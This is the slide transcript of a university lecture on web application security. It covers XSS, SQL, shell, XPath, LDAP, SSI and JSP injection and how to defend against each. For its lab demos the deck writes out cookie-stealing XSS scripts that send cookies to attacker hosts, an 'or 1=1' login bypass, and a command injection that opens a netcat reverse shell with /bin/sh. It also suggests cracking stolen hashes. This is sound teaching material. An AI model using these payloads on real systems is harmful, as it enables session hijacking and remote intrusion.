Web security
1 / 33

Web Security - PowerPoint PPT Presentation

  • Uploaded on

Web Security. Why Web Security: a Real Business Problem. > 60% of total attack attempts observed on the Net are against Web applications > 80% of vulnerabilities discovered are in web apps Independent security audit Regulatory compliance. Auditor finding. Freeform edit box

I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
Download Presentation

PowerPoint Slideshow about ' Web Security' - reese-fletcher

An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.

- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript

Why web security a real business problem
Why Web Security: a Real Business Problem

  • > 60% of total attack attempts observed on the Net are against Web applications

  • > 80% of vulnerabilities discovered are in web apps

  • Independent security audit

  • Regulatory compliance

Auditor finding
Auditor finding

  • Freeform edit box

    • Message to Customer Service

  • XSS issue raised

  • Must provide a response:

    • Prove issue to be a non-problem


    • Describe actions to take

Web applications
Web Applications

  • Big trend: software as a (Web-based) service

    • Online banking, shopping, government, etc.

    • Cloud computing

  • Applications hosted on Web servers

    • Written in a mixture of PHP, Java, Perl, Python, C, ASP

  • Security is rarely the main concern

    • Poorly written scripts with inadequate input validation

    • Sensitive data stored in world-readable files

Typical web application design
Typical Web Application Design

  • Runs on a Web server or application server

  • Takes input from Web users (via Web server)

  • Interacts with back-end databases and third parties

  • Prepares and outputs results for users (via Web server)

    • Dynamically generated HTML pages

    • Contain content from many different sources, often including regular users

      • Blogs, social networks, photo-sharing websites…

Two sides of web security
Two Sides of Web Security

  • Web browser

    • Can be attacked by any website it visits

    • Attacks lead to malware installation (keyloggers, botnets), document theft, loss of private data

  • Web application

    • Runs at website

      • Banks, online merchants, blogs, Google Apps, etc.

    • Written in Javascript, PHP, ASP, JSP, Ruby, …

    • Many potential bugs: XSS, SQL injection, XSRF

    • Attacks lead to stolen credit cards, defaced sites, mayhem

Web attacks
Web Attacks

  • Cross Site Scripting (XSS)

  • SQL Injection

  • Shell Attacks

    If interested in more

  • XPATH Injection

  • LDAP Injection

  • SSI Injection

  • JSP Injection


  • Language executed by browser

    • Scripts are embedded in Web pages

    • Can run before HTML is loaded, before page is viewed, while it is being viewed or when leaving the page

  • Used to implement “active” web pages

    • AJAX, huge number of Web-based applications

  • Many security and correctness issues

    • Attacker gets to execute some code on user’s machine

    • Often used to exploit other vulnerabilities

Cross site scripting
Cross Site Scripting

  • Attacker goal: their code into browser

  • XSS forces a website visitor to execute malicious code in his/her browser

  • Count for roughly 80% of all documented security vulnerabilities

Xss risks
XSS Risks

  • XSS abuses render engines or plug-ins

  • Steal browser cookies

  • Steal session info for replay attack

  • Malware or bot installation

  • Redirect or phishing attempt

Xss example 1
XSS Example 1

  • Trudy posts the following JavaScript on a message board:

  • <script language="javascript">

    var url = "http://machineaddress:5000/index.html?cookie=“+ encodeURI(document.cookie);


  • Then run a TCP server listening on port 5000 with e.g., nc –l 5000

  • When Bob views the posted message, his browser executes the malicious script, and his session cookie is sent to Trudy

Xss demo instructions
XSS Demo Instructions

  • Set port forward to bypass the firewall

    ssh -L 8000:netsec-demos:2000 [email protected]

    Note: 8000 is the local port, it's forwarded to netsec-demos port 2000 through netsec-1

  • Use http://localhost:8000 to access http://netsec-demos.cs.northwestern.edu:2000

Xss demo instructions ii
XSS Demo Instructions (II)

  • Login as ychen and post the script with a sexy title (e.g., hot game!)

    <script language="javascript">

    varurl = "http://cal.cs.northwestern.edu:5000/index.html?cookie=";

    url = url + encodeURI(document.cookie);

    new Image().src=url;


    Hi Everyone! Thanks for your cookies!

  • Ssh to any other machine (e.g., cal.cs.northwestern.edu) and run

    nc –l 5000

Simple xss code
Simple XSS Code

varurl = "http://machineaddress:5000/index.html?cookie=“+ encodeURI(document.cookie);

  • document.cookie is the browser's entire cookie for the current website

  • encodeURI() is a javascript function to hex-encode certain characters to be included as part of a URL

    • E.g., changing the space character to %20

    • Make the URL less suspicious

What can trudy do with the cookie
What can Trudy Do with the Cookie?

  • Another user test458 login as and when clicking the post, cookie is sent to ychen

  • Crack Bob’s password (MD5 hash in the cookie) with John the Ripper, Hydra, or any password cracker

    • For more info, http://netsec.cs.northwestern.edu/resources/password-cracking/

  • Use a Firefox plugin like Tamperdata to reset your cookies to impersonate Bob

  • Xss detection
    XSS Detection

    • A client usually is not supposed to send scripts to servers

    • If the server receives <SCRIPT>… or the hex equivalent in an incoming packet and that same script is sent unsanitized in an outgoing packet, then an attack has occurred

      • A sanitized script could look like &ls;SCRIPT&gt;…

    • Any user input must be preprocessed before it is used inside HTML

    Sql injection

    SQL Injection

    Malicious SQL statements run on a database and thus attack the server

    XSS can only target other users

    Sql injection example
    SQL Injection Example

    • Trudy accesses Bob’s website; in which he does not validate input on his sign in form

      • Runs a SQL statement like the following:

      • select username, user_password from minibbtable_users where user_password = md5('johnspassword') and username='johndoe’;

    • Set username to ' or '1'='1

    • select username, user_password from minibbtable_users where user_password = md5('anyrandompassword') and username='' or '1'='1’;

    • Effect: picks any row where the username is blank and the password matches or any row where true.

    • Add “limit 1” to pick the first row

    Sql injection detection
    SQL Injection Detection

    • Input validation on any outgoing SQL statements from the web server to the database server

      • Filter

        • Apostrophes, semicolons, percent symbols, hyphens, underscores, …

        • Any character that has special meanings must be escaped, .e.g., convert ’ into \’

          • Only works for string inputs

          • Different databases have different rules for escaping

      • Check the data type (e.g., make sure it’s an integer)

    Shell attacks

    Shell Attacks

    Control an actual machine like a web server

    Shell attacks1
    Shell Attacks

    • Inject commands into scripts that use Linux utilities

      • E.g., with “;” as command separator in UNIX/LINUX

    • CGI programs like perl can use command-line programs (e.g. grep, ls)

    • Unsanitized input as arguments can lead to command execution.

    Shell attacks demo
    Shell Attacks Demo

    • Search engine in MiniBB webserver executes

      system("echo $user_usr " . $phrase . " >>/tmp/searchlogs");

    • Put phrase as: >/dev/null; id; echo randomdata

      • Hide user ID

      • Store random data in logs to evade detection

    • We can even get a remote shell !

      • >/dev/null; nc cal 5000 -e /bin/sh

    Defense approaches
    Defense Approaches

    • Web firewall/IDS

      • ModSecurity for Apache

      • Commercial: SecureSphere from Impervia

    • Static code analysis

      • Open source: Nikto

      • Commercial:

        • Acutenix Web Vulnerability Scanner

        • N-stalker

    • Education on good coding

      • HTML encoding on input (server-side)

      • Input validation/filtering

    Xss example 2
    XSS Example 2

    • Trudy sends a link of the following URL to Bob that will take him to a personalized page:

    • http://host/personalizedpage.php?username=<script>document.location='http://trudyhost/cgi-bin/stealcookie.cgi?'+document.cookie</script>

    • A page is returned that contains the malicious script, and Bob’s browser executes the script causing his session cookie to be sent to Trudy

    • Hex is often used in place of ASCII for the JavaScript to make the URL less suspicious

    Xpath injection example
    XPATH Injection Example

    • Similar to SQL injection

    • Bob has a form that does not sanitize user-provided input before using it as part of an XPATH query::

      • string(//user[name/text()=’USER_NAME' and password/text()=’USER_PASS']/account/text())

    • Trudy again can provide the following password to change the statement’s logic:

      • X’ OR ‘x’=‘x

      • The statement thus selects the first account

    Ldap injection example
    LDAP Injection Example

    • Server using LDAP for authentication

      • User name initialized, but then uses unchecked user input to create a query

        filter = "(uid=" + CStr(userName) + ")" ' searching for the user entry

    • Attacker can exploit using special characters


    Ldap injection detection
    LDAP Injection Detection

    • Detection is based off of usage of special LDAP characters

      • System monitors input for special characters

      • Either scrubs incoming input or watches for unescaped output passed to database server

    • Detection approach is blackbox

    Ssi injection example
    SSI Injection Example

    • Bob has his server configured to use Server-Side Includes

    • Trudy passes input with an SSI embedded

      <!--#INCLUDE VIRTUAL="/web.config"-->

    • SSI inserts malicious code into normal webpages upon next request

    • Future legitimate users get content containing the tainted code included by the SSI

    Jsp injection example
    JSP Injection Example

    • Similar to SSI injection

    • Bob has a portal server configured to use dynamic code for templates

    • Trudy passes input with an embedded <jsp:include “http://bad.com/1.jsp” >

    • malicious code inserted into webpage

    Jsp injection prevention
    JSP Injection Prevention

    • Prefer static include <%include …>

    • Don’t allow file inclusion outside of server via Java2 Security policies

    • Firewall rules to prevent outbound requests from server

    • Input validation coding

    • Choose portal software not requiring dynamic includes or code execution


    • Suggestions?